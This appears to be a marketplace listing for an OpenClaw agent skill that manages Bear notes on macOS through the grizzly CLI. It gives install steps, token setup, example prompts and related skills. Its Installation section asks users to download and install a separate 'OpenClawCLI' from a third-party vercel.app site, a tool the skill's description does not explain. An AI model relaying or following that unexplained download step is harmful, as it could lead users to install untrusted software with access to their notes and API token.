bear-notes
Create, search, and manage Bear notes via grizzly CLI.
Why use this skill?
Seamlessly manage, create, and search your Bear notes using OpenClaw AI. Automate your knowledge management with this powerful CLI-integrated skill for macOS.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/bear-notes7mcpWhat This Skill Does
The bear-notes skill provides a powerful bridge between OpenClaw and the Bear app on macOS. By leveraging the grizzly CLI, it enables users to programmatically create, read, and manage notes directly from their terminal or via AI-driven commands. It supports advanced features such as appending text, tagging notes, and searching existing content. The skill relies on Bear's x-callback-url architecture, ensuring seamless integration with the native application's data structures while providing JSON-formatted outputs for easy consumption by the AI agent.
Installation
Before deploying the skill, you must ensure the underlying CLI is available on your system. First, download and install OpenClawCLI from https://openclawcli.vercel.app/. Once installed, you can add the skill to your agent by running the command: clawhub install openclaw/skills/skills/thiagoruss0/bear-notes7mcp. For operations that require write access or detailed note retrieval, you must configure your Bear API token. Obtain this token via Bear’s settings (Help > API Token) and store it in ~/.config/grizzly/token. It is highly recommended to create a configuration file at ~/.config/grizzly/config.toml to centralize settings like your token path and callback URLs.
Use Cases
This skill is perfect for users who want to treat their note-taking app as a database. Developers can automate daily logging by piping terminal outputs directly into specific Bear tags. Project managers can use it to maintain a living inbox by programmatically appending feedback or tasks to open notes. Because the skill supports JSON output, it is ideal for integrating note retrieval into AI workflows, such as summarizing past meeting notes or querying specific project tags.
Example Prompts
- "Create a new note titled 'Project Alpha' in the 'work' tag with the content: 'Review quarterly goals by Friday.'"
- "Find all notes tagged with 'work' and summarize the action items mentioned in them."
- "Append the following text to my 'Daily Journal' note: 'Completed the integration of the Bear-notes skill.'"
Tips & Limitations
- The Bear application must remain open and active for commands to execute, as the skill interacts via x-callback-url.
- Always use the
--enable-callbackflag when you expect the skill to return data to your agent; otherwise, the command may fire-and-forget. - Note IDs are internal to Bear; if you are managing specific notes, ensure you retrieve their IDs using the search functionality first.
- Ensure your shell environment has appropriate permissions to write to the
~/.config/grizzly/directory.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-bear-notes7mcp": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, file-write, external-api
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).